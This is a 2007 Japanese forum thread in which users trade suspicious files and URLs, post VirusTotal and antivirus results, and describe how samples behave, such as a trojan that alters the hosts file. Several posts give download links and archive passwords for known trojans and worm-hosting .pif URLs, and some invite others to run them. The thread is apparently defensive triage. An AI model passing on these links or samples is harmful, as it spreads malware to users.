613 :名無しさん@お腹いっぱい。:2007/02/27(火) 07:44:51
ttp://www8.axfc.net/uploader/15/so/N15_17000.zip.html
key:WinRAR
ttp://up3.viploader.net/mini/src/viploader114040.zip.html
key:ad-aware

614 :名無しさん@お腹いっぱい。:2007/02/27(火) 08:14:34
crack.wrar37b.exe - TROJ_AGENT.VAP
aaw6jp_Setup.exe - TSPY_LDPINCH.TF

615 :名無しさん@お腹いっぱい。:2007/02/27(火) 10:29:38
Trojan-Downloader.Win32.Agent.auv
crack.wrar37b.exe

Trojan-PSW.Win32.LdPinch.bnk
aaw6jp_Setup.exe

616 :名無しさん@お腹いっぱい。:2007/02/27(火) 11:08:34
Complete scanning result of "CRACK.WRAR37B.zip", processed in VirusTotal at 02/27/2007 03:03:15 (CET).

[ file data ]
* name: CRACK.WRAR37B.zip
* size: 129259
* md5.: 81c2ade466bf4533952dd86f45685546
* sha1: 85841c0f585ff0cf34675083160f75177dc14d28

[ scan result ]
AntiVir 7.3.1.38/20070226 found [TR/Dldr.Agent.auv.16]
Authentium 4.93.8/20070226 found [W32/Downloader.BDAU]
AVG 386/20070225 found [Downloader.Agent.IQJ]
eSafe 7.0.14.0/20070227 found [Win32.Agent.auv]
Ewido 4.0/20070226 found [Downloader.Agent.auv]
F-Prot 4.3.1.45/20070226 found [W32/Downloader.BDAU]
F-Secure 6.70.13030.0/20070227 found [Trojan-Downloader.Win32.Agent.auv]
Fortinet 2.85.0.0/20070226 found [W32/Agent.AUV!tr.dldr]
Ikarus T3.1.1.3/20070226 found [Trojan-Downloader.Win32.Agent.auv]
Kaspersky 4.0.2.24/20070227 found [Trojan-Downloader.Win32.Agent.auv]
NOD32v2 2082/20070226 found [Win32/TrojanDownloader.Agent.NJC]
Norman 5.80.02/20070226 found [W32/DLoader.dam]
Panda 9.0.0.4/20070226 found [Trj/Downloader.MZB]
Prevx1 V2/20070227 found [Dropper.Payload]
TheHacker 6.1.6.065/20070226 found [Trojan/Downloader.Agent.auv]
VBA32 3.11.2/20070226 found [Trojan-Downloader.Win32.Agent.auv]


617 :名無しさん@お腹いっぱい。:2007/02/27(火) 11:10:24
Complete scanning result of "AAW6JP_SETUP.zip", processed in VirusTotal at 02/27/2007 02:48:20 (CET).

[ file data ]
* name: AAW6JP_SETUP.zip
* size: 255547
* md5.: 39e3083a87feee3d7b1e61fe351ffc49
* sha1: a7f775df4107421dfb8ee1c1e7a3be4c1cfae4e0

[ scan result ]
AntiVir 7.3.1.38/20070226 found [TR/Crypt.XPACK.Gen]
Authentium 4.93.8/20070226 found [could be a corrupted executable file]
AVG 386/20070225 found [PSW.Ldpinch.EOZ]
CAT-QuickHeal 9.00/20070226 found [(Suspicious) - DNAScan]
eSafe 7.0.14.0/20070227 found [Win32.LdPinch.bnk]
Ewido 4.0/20070226 found [Trojan.LdPinch.bnk]
F-Secure 6.70.13030.0/20070227 found [Trojan-PSW.Win32.LdPinch.bnk]
Fortinet 2.85.0.0/20070226 found [W32/LdPinch.BNK!tr.pws]
Ikarus T3.1.1.3/20070226 found [Trojan-PWS.Win32.LdPinch.bnk]
Kaspersky 4.0.2.24/20070227 found [Trojan-PSW.Win32.LdPinch.bnk]
NOD32v2 2082/20070226 found [Win32/PSW.LdPinch.BNK]
Norman 5.80.02/20070226 found [W32/LdPinch.HPL]
Panda 9.0.0.4/20070226 found [Suspicious file]
Sunbelt 2.2.907.0/20070224 found [VIPRE.Suspicious]
TheHacker 6.1.6.065/20070226 found [Trojan/PSW.LdPinch.bnk]
UNA 1.83/20070226 found [Win32.CRYPT.virus]
VBA32 3.11.2/20070226 found [Trojan-PSW.Win32.LdPinch.bnk]
VirusBuster 4.3.19:9/20070226 found nothing

618 :名無しさん@お腹いっぱい。:2007/02/27(火) 11:12:02
↑スマソ、VirusBuster 4.3.19:9/20070226 found nothing
消し忘れた。

619 :名無しさん@お腹いっぱい。:2007/02/28(水) 15:10:10
ぁゃιぃ

620 :名無しさん@お腹いっぱい。:2007/03/02(金) 03:09:05
ロリヲタ

621 :名無しさん@お腹いっぱい。:2007/03/09(金) 23:41:45
ネタが

622 :名無しさん@お腹いっぱい。:2007/03/09(金) 23:43:34
ない

623 :名無しさん@お腹いっぱい。:2007/03/10(土) 13:09:53
あげ

624 :名無しさん@お腹いっぱい。:2007/03/12(月) 18:43:59
今日ネトラン買ったらこのスレからネタひろってんな
モスキート悪用促進してんじゃねーよ

625 :名無しさん@お腹いっぱい。:2007/03/12(月) 19:18:04
>>624
犯罪行為堂々と推薦してる雑誌ですから

626 :名無しさん@お腹いっぱい。:2007/03/12(月) 19:47:48
まじか

627 :名無しさん@お腹いっぱい。:2007/03/12(月) 23:10:33
>>624
今に始まったこっちゃねぇ

628 :名無しさん@お腹いっぱい。:2007/03/13(火) 02:10:53
>>624
kwsk

629 :名無しさん@お腹いっぱい。:2007/03/13(火) 19:32:24
p88

630 :名無しさん@お腹いっぱい。:2007/03/13(火) 20:56:06
わたくし、とあるカルト団体の批判をmixiでやってるんですが、
怪しいファイルがメールで届けられたんです。
本来なら掲示板のログのはずなんですが、
拡張子がない。
それから、goo mailからダウンロードするたびにファイル名が変わる。
http://kuro33.sakura.ne.jp/kuro-up/index.html
kuro_0264.txt
これでございます。
パスはnews

どなたかお力をお貸しください。

631 :630:2007/03/13(火) 20:56:50
ちなみに、拡張子は便宜的に適当につけたものです。

632 :名無しさん@お腹いっぱい。:2007/03/13(火) 21:16:38
ネトランもホンと馬鹿者が多いな。

633 :名無しさん@お腹いっぱい。:2007/03/13(火) 23:15:06
何で 上祐史浩のmixiが こんなとこに貼ってあんだよw

634 :名無しさん@お腹いっぱい。:2007/03/13(火) 23:23:59
諸先輩方の検証を頂きたいのですが、下記URLは楽器の
tab譜が充実しているサイトだと思います。S&Gの「The BOXER」
を検索すると、Windowsが何かをDLしようとします。
すぐキャンセルしますが、nortonもウィルスの反応し
問題を解決してくれました。便利なサイトなので利用
したいのですが、止めた方がいいでしょうか?
それとも利用するに当たり注意する方法があれば
教えていただけないでしょうか?

635 :634:2007/03/13(火) 23:25:25
すみません、URLを書くのを忘れました。

これです。
ttp://www.911tabs.com/bands/t/

636 :名無しさん@お腹いっぱい。:2007/03/13(火) 23:29:59
意味が分からん。俺もよくそこ利用するけど勝手にDLなんてされないよ。
ポップアップはひたすら閉じてればいいだけど。

637 :634:2007/03/13(火) 23:43:31
>>636
ありがとう。上記のメインページは問題なく検索先に問題が
あるか、何かを間違えてクリックしたのかも知れません。

638 :名無しさん@お腹いっぱい。:2007/03/14(水) 19:49:52
up.uppple.com/src/up2551.jpg
トロイらしいんですが詳しくわかりますか?

639 :名無しさん@お腹いっぱい。:2007/03/14(水) 20:03:40
ttp://up.uppple.com/src/up2551.jpg
もう消えてるから分からんw

640 :名無しさん@お腹いっぱい。:2007/03/14(水) 20:39:19
>>639
トロイというか、何でもありのブラクラ系だな。
iframe 多数でどっかから、ウイルスとかスパイウェアと呼び込んでるかも。
後、mailto、telnet、FDDアタック、concon、無限ウィンドウオープン等々。
拡張子jpgだが、中身html。

641 :名無しさん@お腹いっぱい。:2007/03/16(金) 00:09:23
http://www.filecroc.com/filecroc101.exe
インストールおねがい!


642 :名無しさん@お腹いっぱい。:2007/03/16(金) 00:33:12
↓おねがい!

643 :名無しさん@お腹いっぱい。:2007/03/16(金) 03:28:53
ttp://kissho1.xii.jp/7/src/7jyou1418.avi
これで変なタスクバーアイコンをゲットしました。

644 :名無しさん@お腹いっぱい。:2007/03/16(金) 16:56:37
>>643
7jyou1418.avi - infected by Trojan.JS.WindowBomb.g

645 :名無しさん@お腹いっぱい。:2007/03/16(金) 17:27:11
>>643
   1.文件名:7jyou1418.avi
   不是病毒

646 :名無しさん@お腹いっぱい。:2007/03/16(金) 18:03:39
>>643
aviだと思って定義ファイル未更新のNorton2005で踏んだから死んだ。

647 :名無しさん@お腹いっぱい。:2007/03/16(金) 22:18:37
>>641
TR/VB.WY.17@AntiVir PersonalEdition Classic

ttp://www.avira.com/en/threats/section/vdfhistory/vdf_no/6.38.00.67/6.38.00.67.html?term=TR/VB.WY.17

VDF6.38.00.67で対応したとか書いてあるけど、実際は6.38.00.66で検知できてる。
さすがドイツ!

648 :名無しさん@お腹いっぱい。:2007/03/16(金) 22:26:13
>>647
filecrocってP2Pだろ。
実はトロイなの?

649 :名無しさん@お腹いっぱい。:2007/03/16(金) 22:46:48
うちのantivir反応しねえぞ
vtではsunbeltのみ反応したけどsunbeltだからねえ…
http://www.virustotal.com/vt/en/resultadof?d676f0c6df3b4600b63a998c21e743c6

インスコする気にはならんけど


650 :名無しさん@お腹いっぱい。:2007/03/16(金) 22:51:55
トップページには100% CLEAN NO SPYWARE、 NO ADWARE 、NO POPUPS て書いてある。

651 :名無しさん@お腹いっぱい。:2007/03/18(日) 01:04:31
http://company-crime.myeweb.net

Aviraのアラートでまくるけど、それすり抜けてTelenetが外部にアクセス始めるは、
OEにアカウント作成してサーバに繋ごうとする。さらにPIFファイルまでDLしようとする。
((((;゜д゜)))ガクガクブルブル



ほんと?
ぁゃιぃhtmlを実行してみる勇者キボンヌ

652 :名無しさん@お腹いっぱい。:2007/03/18(日) 01:26:10
トップページには何も無い
落としてメモ帳ででも中身見てみろ

有害なのはこっち
悪意のあるサイトを適当に呼び出す
company-crime.myeweb.net/window_dressing/

>それすり抜けてTelenetが外部にアクセス始めるは、OEにアカウント〜
↓を呼び出すため
www.hellplant.org/cgi-bin/xoor/serpent.cgi

>さらにPIFファイルまでDLしようとする
www.abisource.com/mailinglists/abiword-dev/2005/Jun/att-0006/phone_number2.pif
「Email-Worm.Win32.NetSky.t」
seti.sentry.net/archive/bioastro/2003/Feb/att-0025/Document003.pif
「Email-Worm.Win32.Sobig.a」
lists.w3.org/Archives/Public/site-comments/2003Aug/att-0008/movie0045.pif
「Email-Worm.Win32.Sobig.f」
lists.suse.com/archive/suse-sparc/2004-Jan/att-0009/message.pif
「Email-Worm.Win32.Mydoom.a」
lists.w3.org/Archives/Public/www-dom/2001OctDec/att-0204/sensitive.pif
「Email-Worm.Win32.Magistr.b」
等など以下略

653 :名無しさん@お腹いっぱい。:2007/03/18(日) 01:38:17
.pifってめずらしいな
拡張子表示されないんだっけ


654 :名無しさん@お腹いっぱい。:2007/03/18(日) 10:47:18
>>651
今いってみたら何も残っていなかったわけだが

655 :名無しさん@お腹いっぱい。:2007/03/18(日) 11:42:40
>>652
ウィルスのオンパレードだ((((;゚Д゚)))ガクガクブルブル
でも有名どころだから対応はしてると思うけど。

656 :名無しさん@お腹いっぱい。:2007/03/18(日) 19:11:26
>>651
最近は、日本でも海外でも独自のドメインも簡単にとれて、サーバーも手軽に借りれるから、
ものの1時間もあれば、別のURLでまた出現するかも。

657 :名無しさん@お腹いっぱい。:2007/03/19(月) 04:37:05
ttp://xtp0001.s3.x-beat.com/cgi-bin/up/source/Sonata_21789.jpg

これも色々読み込まれるっぽい

658 :名無しさん@お腹いっぱい。:2007/03/19(月) 05:12:16
>>657
紫だからすでに踏んでた^^;

-- 「2007/03/18 10:58」のキャッシュをチェックしています。 --
※このアドレスは危険URLのひとつです。
注意!ループタグを発見! (1)
注意!逃げウィンドウを発見! (1)
ブラクラチェックが終了しました。

※ ジャンプタグを発見しました。(1)
※ このページは自動的にリロードされるようです。
※ windowオープンを発見しました。(5)
※ プラグインデータを発見しました。(1)
http://www.thepocket.com/wavs/moneypit3.wav
※ インラインフレームタグを発見しました。 (134)
http://anycracks.com/
http://www.kuronowish.net/links/
http://blueslyrics.tripod.com/artistswithsongs/gary_moore_1.htm
http://www.geocities.com/fuzoku_ou/index.htm
http://www.matureobsesion.com/indexnc.php
※ 隠しスクリプトを発見しました。(1)
http://x8.ninpou.jp/ufo/109915201
上記アドレスのチェックもお勧めします。(そのままチェックできます。)
※ 注意!一部タグが大量に使われています。
[このアドレスの安全度 0%]

659 :名無しさん@お腹いっぱい。:2007/03/19(月) 05:30:46
>>657
ウイルスいっぱい
鑑定スレでさんざん既出

660 :名無しさん@お腹いっぱい。:2007/03/24(土) 20:30:22
            _|_
          /_\
           ̄|U ̄  
   ∧_∧    /ミヽ、 
   ( ・ω・)  ノミシ三 `~゚
   (っ ≡つ=つ゚  ゚ 
   ./   ) ババババ
   ( / ̄∪

            _|_
          /_\
  ヒュン       ̄|U ̄  
 ∧_∧ _∧  /ミヽ、 
((( ・ω・)三ω・) ノ ヽ  `~゚ ))
  (_っっ= _っっ゚   ゚ 
   ヽ   ノ ヒュン
   ( / ̄∪

661 :名無しさん@お腹いっぱい。:2007/03/25(日) 22:07:31
http://doiob.net/doiob/uploader/src/up1166.zip

ブログ版をPDFファイルにしてみました。
縦書きにしています。
Adobe Readerで読んでください。

いきなり不足してるフォントをダウンロードに行きますので、
慌てないでください。

************

これ、何度か見かけたのだが
あからさまに怪しいが自分で解凍する勇気は無い

662 :名無しさん@お腹いっぱい。:2007/03/25(日) 22:53:18
>>661
403ですよー

663 :名無しさん@お腹いっぱい。:2007/03/26(月) 04:44:06
過疎ってるな

664 :名無しさん@お腹いっぱい。:2007/03/28(水) 06:21:26
Winnyを狙ったワーム・ニュイルス情報 Part60
ttp://tmp6.2ch.net/test/read.cgi/download/1170937127/534
にあがってた未検知ファイルをAntiVirに送ってたんだけど、
2msn.exeだけ

The file '2msn.exe' has been determined to be 'CLEAN'.
Our analysts did not discovered any malicious content.
と言われた

3/10時点でのvirustotalのSSは、
ttp://up.uppple.com/src/up2585.png

俺の環境では、踏む気になれないので、勇気のある人(?)実行たのむ
ttp://up.uppple.com/upload.cgi?mode=dl&file=2584
vip

665 :名無しさん@お腹いっぱい。:2007/03/28(水) 06:57:19
なんも起きんかった
実行ファイルの挙動や動作のログを取ってくれるツールってなかったっけ?
どこにファイル追加した、とかここのレジストリいじった、とか
あまりにも使わないんでどっかいってしまった

666 :名無しさん@お腹いっぱい。:2007/03/28(水) 07:04:47
>>665
砂箱のことか?

667 :名無しさん@お腹いっぱい。:2007/03/28(水) 07:15:43
>>666
ファイルの実行それ自体を阻止するとかじゃなくて、ただ挙動を調べるだけ
確かそのツールをかまして起動させるような感じだった
そんなSandBoxあった?

668 :名無しさん@お腹いっぱい。:2007/03/28(水) 07:27:58
Total Uninstall とか かな
ttp://cowscorpion.com/Registry/totaluninstall.html

この手のやつは得られる情報が多すぎて
中々しっくりくる物が見つからなくて困ってる

669 :名無しさん@お腹いっぱい。:2007/03/28(水) 08:23:55
>>665 thx
Backdoor Trojan Downloader ってのは誤検出で
Aviraのanalystsが正しいってことでおk(?)かな
そもそも、うp主が何のファイルを上げていたのかも分からないが…(^^

670 :名無しさん@お腹いっぱい。:2007/03/28(水) 08:24:17
>>668
そか、これでも一応できるか
前に利用してたのはインストール不要でもっちょっと軽かった
少し思い出して探してみるわ

671 :名無しさん@お腹いっぱい。:2007/03/29(木) 13:56:03
**雑音**

* INTEL製品を頼まれもしないのに擁護/マンセーしライバル製品を攻撃する
* 主にAMD製CPU叩きとNOD32及びPestPatrol以外のソフト叩きに異様に執着
* セキュ板、自作PC、PC一般、DTV板、情報システム板、まれにプログラマ板などに出没
* C言語プログラミングはおろかSIMD(MMX,SSEなどの処理系)をSIMMと書き続け、 超超超初級
プログラム問題さえも解けない、完全なプログラミング素人
* BlackIc、Prescotte、シンプルオブベスト、チッンボチップ、骨髄反射、MEMTEST86+で/onecpu、OutLock、ゴミグス、アントネトバ、クアッドPU、ニーと、低商品電力、95umから65umにシュリンク、風評努力など想像を絶する間違いを犯す。
 結論:頭がおかしい。
* ある自分の無知を晒して以来名無し、別コテで自作自演
* 虫を必死に連呼(連呼するのが雑音なのでわかりやすい)

ttp://z-temp.hp.infoseek.co.jp/2ch/Prescott699-.html
ttp://66.102.7.104/search?q=cache:yFC7aJM6xCgJ:l-lab.org/pukiwiki/pukiwiki.php

近況や出没情報はこちらに

【動機は?】雑音犬畜生Part37【●持ち】
http://tmp6.2ch.net/test/read.cgi/tubo/1167055200/

一日中、目が開いてる間ずっと、自分じゃロクに買いもしない
Intelを讃えてAMDを敵視し、自演と自滅の繰り返し・・・

ホント、そろそろ本当の“動機”を語ってほしいぞ。
よっぽどの、恨みつらみがあるんだろうから。

逆恨みなのは、もうみんな分ってるけどねw

672 :名無しさん@お腹いっぱい。:2007/03/29(木) 19:45:31
ここで自分の使っているアンチウイルスの検出力をテストせよ
http://pc11.2ch.net/test/read.cgi/sec/1174461579/

673 :名無しさん@お腹いっぱい。:2007/03/30(金) 09:10:24
バカが自分勝手に遊んでるだけで調査になってない
検出力などAV-ComparativesやVB100%のような専門機関がスレ結果だけで十分

674 :名無しさん@お腹いっぱい。:2007/03/30(金) 09:12:14
あーあ、スレ結果だって、する結果だ
まぁそもそも実行するスレと何の関係もないんで、下らないスレ貼るなよ

675 :名無しさん@お腹いっぱい。:2007/03/30(金) 11:38:26
>>674
セキュリティ板の各スレに手当たり次第に書き込んでいるだけの
かわいそうな人なので、やさしく放っておいてあげて下さい

676 :名無しさん@お腹いっぱい。:2007/03/31(土) 13:04:22
http://www.dotup.org/uploda/www.dotup.org6925.zip.html
p:virus

ウイルスでしょうか

677 :名無しさん@お腹いっぱい。:2007/03/31(土) 14:19:08
あっちのスレの連中に聞け

678 :名無しさん@お腹いっぱい。:2007/03/31(土) 15:37:09
つttp://2ch-news.net/up/up53900.png
マイナーばかりが、検出
なんか、ぁゃιぃ…

679 :名無しさん@お腹いっぱい。:2007/03/31(土) 16:07:29
>>676
実行したらexeファイルに感染しまくり

680 :名無しさん@お腹いっぱい。:2007/03/31(土) 18:55:41
C:\WINDOWS\System32\BASSMOD.dllけしとけ

681 :名無しさん@お腹いっぱい。:2007/03/31(土) 18:59:28
>>679
kwsk

682 :名無しさん@お腹いっぱい。:2007/04/01(日) 05:37:18
http://www.abisource.com/mailinglists/abiword-dev/2005/Jun/att-0006/phone_number2.pif
http://www.cumsshut.com/
http://sakuratan.ddo.jp/uploader/source/date35978.lzh

683 :名無しさん@お腹いっぱい。:2007/04/01(日) 06:09:21
3つめはスキャンしないほうが良い

684 :名無しさん@お腹いっぱい。:2007/04/02(月) 06:05:55
これは大丈夫でしょうか?

http://imepita.jp/20070313/664490

685 :名無しさん@お腹いっぱい。:2007/04/02(月) 07:36:14
>>684
スレ違い

勇気が無くて見られない画像解説スレ Part845
http://etc6.2ch.net/test/read.cgi/entrance/1175217796/

686 :名無しさん@お腹いっぱい。:2007/04/04(水) 00:07:38
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
のRunがなくてExplorerなんだけどどうしたらいいんでしょうか

687 :名無しさん@お腹いっぱい。:2007/04/04(水) 01:07:08
>>686
スレ違い

【エスパー】超初心者の質問に答えるスレ458【マヅレス】
http://pc11.2ch.net/test/read.cgi/pc/1175587830/

688 :名無しさん@お腹いっぱい。:2007/04/05(木) 16:12:10
某所で拾ったファイル(元名-ジャケット(長い空白).exe)
virustotalの結果は、どこも検知しなかった
実行お願いします
ttp://2ch-news.net/up/up55312.png
ttp://2ch-news.net/up/up55310.zip.html
vip

689 :名無しさん@お腹いっぱい。:2007/04/05(木) 21:11:18
tempになにやら.batを追加

690 :名無しさん@お腹いっぱい。:2007/04/05(木) 21:59:21
>>689 thanxです
どこも検知せずフォルダアイコン・空白.exeだったんで
新種か?と思ったんですが、PCには影響なさそうですか?
失敗ウイルスか何かでしょうかね?

691 :名無しさん@お腹いっぱい。:2007/04/05(木) 22:55:46
Filename Result
jacket.exe MALWARE

The file 'jacket.exe' has been determined to be 'MALWARE'. Our analysts discovered that the file is a Trojan.
In general this kind of programs contains harmful functionality called payload.
Detection will be added to our virus definition file (VDF) with one of the next updates.

by AVIRA

692 :半角の鑑定人:2007/04/05(木) 23:04:07
jacket.exeを実行して作られるファイルは下記
:C:\Documents and Settings\Owner\Recent\jacket.lnk
:C:\Documents and Settings\Owner\Recent\ジャケット_001.jpg.lnk
:C:\WINDOWS\Prefetch\JACKET.EXE-2C51C580.pf

あとはレジストリの HKEY_CURRENT_USE に Cache が作られるだけ。

女の子のジャケット画像が出てくるだけです。
システムやレジの重要な部分には一切触れません。
PC無害です。

>>691
直踏み検証結果ですか?

693 :名無しさん@お腹いっぱい。:2007/04/05(木) 23:08:57
んや
実行めんどいんでAVIRAにおくっただけ

694 :名無しさん@お腹いっぱい。:2007/04/05(木) 23:13:25
Winny.exeやらどっかの掲示板のURLやらが書かれているから
暴露か自動書き込み関係と思ったけど

作成者の意図通りに動作してないのかも

695 :半角の鑑定人:2007/04/05(木) 23:24:10
AVIRAでペイロードを検出したみたいですから
694サンの言うとおりで 作成者の意図通りに動作してないのでしょうね。
一応 通信もNEGiESで見たんですけど特に目立った通信は無いようです。
何度踏んでも>>692の結果です。

696 :688:2007/04/05(木) 23:38:09
>>691 thanx
今メール見たら、Aviraから返事が来てました
こんなに速く来るのは珍しいので驚いてます
>>半角の鑑定人さん
検証 thanxです
>>694
>作成者の意図通りに動作してないのかも
やはり、そんな感じもしますが
一応、皆さんお気をつけてください

697 :名無しさん@お腹いっぱい。:2007/04/05(木) 23:48:57
お気を付けもなにもこんなもん踏みようがねえよ

698 :名無しさん@お腹いっぱい。:2007/04/07(土) 06:41:10
>>664
ダウンロード後に出るDriveCleanerの詐欺広告のほうがウザス

699 :名無しさん@お腹いっぱい。:2007/04/08(日) 06:07:10
>>688
送信日時 : 2007年4月6日 21:07:20
Hello.
New malicious software was found in the attached file
(Email-Flooder.Win32.Agent.e).

700 :699:2007/04/08(日) 06:13:21
by かすぺ

701 :名無しさん@お腹いっぱい。:2007/04/08(日) 20:45:35
実行して検証しただけじゃ完全に挙動把握できるわけじゃない
ポリモーフイック型なんかだとカスペラボでも解析に1週間はかかるんだとさ

702 :名無しさん@お腹いっぱい。:2007/04/13(金) 09:41:02
http://kissho.xii.jp/1/src/1jyou3143.avi

偽装ぽいので鑑定よろ

703 :名無しさん@お腹いっぱい。:2007/04/13(金) 09:42:36
鑑定スレへどうぞ

704 :名無しさん@お腹いっぱい。:2007/04/13(金) 09:57:02
>>703
鑑定スレじゃ詳しくは判明しなかったので…
マルチぽいですが是非お願いしたいのです。

705 :名無しさん@お腹いっぱい。:2007/04/13(金) 10:14:24
>>704
転載

ウイルス&男の笑い声でした
AVGで以下を検出
Exploit.wmfが3つ
Exploit.aniが2つ
トロイ色々が4つ
スクリプトウイルスが1つ
PC有害 

706 :名無しさん@お腹いっぱい。:2007/04/13(金) 10:34:50
Loveletterて・・・懐かしすぎ。

707 :名無しさん@お腹いっぱい。:2007/04/18(水) 15:16:18
過疎りすぎw

708 :名無しさん@お腹いっぱい。:2007/04/18(水) 15:48:19
∧_∧
( ´・ω・)
( つ旦O
と_)_)

709 :名無しさん@お腹いっぱい。:2007/04/21(土) 06:06:54
2chCloserってどーよ
ttp://www16.plala.or.jp/spichilz/soft13.html

710 :名無しさん@お腹いっぱい。:2007/04/21(土) 11:07:52
>>709
暇だったんで実行してみようかなとダウソしてみたら
2chCloser.exeを カスペがTrojan.Win32.Delf.abeとして検知。
多分 トロイと同じ様な動きをするんだろな

711 :名無しさん@お腹いっぱい。:2007/04/21(土) 16:47:13
>>710
俺もカスペだから反応したけど、微妙だね……。
ttp://ehoba.mydns.jp/loada/src2/tfxup0334.png

712 :710:2007/04/21(土) 18:34:07
>>711
カスペを遮断して実行してみた。
hostsファイルの改ざんがありますね。
あとは 2chCloserを起動監視した状態でタスクマネージャで強制終了させても
自分自身のコピーが復活します。
ここでカスペを実行させると Trojan.Win32.Qhost.leとBackdoor.Win32.Agent.anfを検知しました。
山田オルタナティブの亜種との事。どうもservise.exeが同じ様な働きをするみたいですね。

713 :名無しさん@お腹いっぱい。:2007/04/22(日) 07:33:18
フォルダが2chになってる場所も開くと問答無用で閉じるw
オプションの監視対象に、レジストリエディタ、タスクマネージャ、システム構成ユーティリティも
ttp://up.uppple.com/src/up3215.png


全てのオプションをチェックした状態の2chCloserと改変されたhostファイル
ttp://up.uppple.com/upload.cgi?mode=dl&file=3216
DLKey:2ch

714 :名無しさん@お腹いっぱい。:2007/04/22(日) 09:36:18
ダウンロードしてみました。
「host 10KB」ファイルはWindowsのHOSTSファイルを改変します。
その結果 2ch関係がが「localhost」への接続になり、接続できなくなります。
以下が、改変されるアドレス(全リストははるかに長くなります)の例があります。
127.0.0.1 2ch.net
127.0.0.1 www.2ch.net
127.0.0.1 www2.2ch.net
127.0.0.1 www2b.2ch.net
127.0.0.1 www2f1.2ch.net

このhostsファイルはTrojan.Win32.Qhostの亜種( .le)としてカスペルスキーが検知しました。
ですが 接続を拒否するために使用するのであれば無害なファイルです。

715 :名無しさん@お腹いっぱい。:2007/04/23(月) 00:50:46
   シュボッ         キャノン版(笑)もうやだ・・・
       ., ∧_∧
      []() (・ω・` )      l二ヽ
       □と    ) ̄⊃     ) )
      ⊂ (_(_つ   ̄⊃  / ̄ ̄ ̄ヽ
       ⊂_      ._⊃   | (\/) |
         ⊂__⊃.      |  > <  |
                     | (/\). |
                     ヽ___/

716 :名無しさん@お腹いっぱい。:2007/04/28(土) 17:39:24
winpt42n_7C6C6C0F.dll
という1kのファイルがsystem32に作られてたんだけど、何これ?


717 :名無しさん@お腹いっぱい。:2007/04/29(日) 02:02:10
434 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/04/29(日) 01:59:08
勇者さんいますか?
いたらお仕事ですwww

124 名前:萌える名無し画像[sage masami] 投稿日:2007/04/28(土) 22:46:26 ID:sWFHMRli0
http://kissho.sytes.net/5000zz/upload.cgi?mode=dl&file=4661

 ↑
これウィルスですか?
それとも単なるaviファイル?
意味分からんですと

http://pie.bbspink.com/test/read.cgi/girls/1177489031/124-
http://etc6.2ch.net/test/read.cgi/qa/1176034702/724


因みにノートン入れてるPCは反応する


718 :名無しさん@お腹いっぱい。:2007/04/29(日) 07:39:11
解凍すると「新しいフォルダ」「新しいフォルダ2」を作成

「新しいフォルダ」
・「[CM] ロッテ ガーナミルクチョコレート(母の日宣言07篇) 60秒.avi」 CM動画。無害
・Thumbs.db 無害

「新しいフォルダ2」
・test.exe Trojan.Win32.Haradong.ap

719 :名無しさん@お腹いっぱい。:2007/04/29(日) 07:49:23
原田さんキタ━━━━━(゚∀゚)━━━━━ !!!!!

720 :名無しさん@お腹いっぱい。:2007/04/29(日) 07:54:59
これ、ここ二〜三日格スレに貼られたらき☆すたウイルスじゃない?

721 :名無しさん@お腹いっぱい。:2007/04/29(日) 07:57:44
原田の方のみ
ttp://www.uploda.org/uporg790984.zip.html
DL:harada

実行したい人、各所に通報したい人どぞ

722 :名無しさん@お腹いっぱい。:2007/04/29(日) 08:03:00
追記

「test.exe」
サイズ 147,456
MD5 bb9b7e71bf62fdd81d63fdc46dca6247

723 :名無しさん@お腹いっぱい。:2007/04/29(日) 08:22:16
>>718
これはカスペで引っかかったのかな?

724 :名無しさん@お腹いっぱい。:2007/04/29(日) 09:19:34
>>723
カスペ(及びカスペエンジンのアンチウイルス)
落とした時には既に対応していたから、誰か通報したんじゃないかな

シマンテックは最初からかな

725 :あああ:2007/04/29(日) 17:06:09
ここか?

726 :えええ:2007/04/29(日) 20:14:36
何が?

727 :名無しさん@お腹いっぱい。:2007/04/30(月) 11:10:51
http://www.virustotal.com/
ここでスキャンしても、”es mayor”としか表示されません。
どうしてでしょう。 何回やっても同じです。

728 :んんん:2007/04/30(月) 17:20:55
何が?

729 :名無しさん@お腹いっぱい。:2007/04/30(月) 17:28:20
>>727
容量オーバーじゃね?

730 :名無しさん@お腹いっぱい。:2007/05/04(金) 00:07:58
保守っ

       *'``・* 。
        |     `*。
       ,。∩A_A  _*
      + (o・ _ ・o)/∠ +゚
      `*。 ヽ、  つ/*゚* みんな集まれ〜
       `・+。*・' ゚⊃ +゚
       ☆   ∪~ 。*゚
        `・+。*・ ゚

731 :名無しさん@お腹いっぱい。:2007/05/04(金) 12:19:46
もうどうにでもな〜れ                    もうどうにでもな〜れ
 もうどうにでもな〜れ                  もうどうにでもな〜れ
  もうどうにでもな〜れ                もうどうにでもな〜れ
   もうどうにでもな〜れ              もうどうにでもな〜れ
    もうどうにでもな〜れ            もうどうにでもな〜れ
     もうどうにでもな〜れ          もうどうにでもな〜れ
      もうどうにでもな〜れ        もうどうにでもな〜れ
       もうどうにでもな〜れ      もうどうにでもな〜れ
                    *'``・* 。
                    |     `*
もうどうにでもな〜れ     ,。∩∧_∧   * .   もうどうにでもな〜れ
もうどうにでもな〜れ    + (´・ω・`) *。+゚    もうどうにでもな〜れ
もうどうにでもな〜れ    `*。 ヽ、  つ *゚*    もうどうにでもな〜れ
                   `・+。*・' ゚⊃ +゚
                   ☆   ∪~ 。*゚
                    `・+。*・ ゚
       もうどうにでもな〜れ      もうどうにでもな〜れ
      もうどうにでもな〜れ        もうどうにでもな〜れ
     もうどうにでもな〜れ          もうどうにでもな〜れ
    もうどうにでもな〜れ            もうどうにでもな〜れ
   もうどうにでもな〜れ              もうどうにでもな〜れ
  もうどうにでもな〜れ                もうどうにでもな〜れ
 もうどうにでもな〜れ                  もうどうにでもな〜れ
もうどうにでもな〜れ                    もうどうにでもな〜れ


732 :名無しさん@お腹いっぱい。:2007/05/05(土) 21:05:51
人いますか?
お暇な方お願いします。Registry Repair Doctorなるソフトです。
ttp://www.malwaresweeper.com/download/msrd.exe
他怪しいものが沢山と配布されてるみたいですが
ttp://www.malwaresweeper.com/download.html

よろしくおね


733 :名無しさん@お腹いっぱい。:2007/05/14(月) 18:21:13
      ∧_∧
     (´・ω・) < ほしゅ
     ( O┬O    きこきこ〜〜〜
    ◎-∪'┴◎


734 :名無しさん@お腹いっぱい。:2007/05/18(金) 00:50:02
このスレも過疎スレに…
ここから拾ってきて実行すればOKw

【信者】検出可否報告スレ2【禁止】
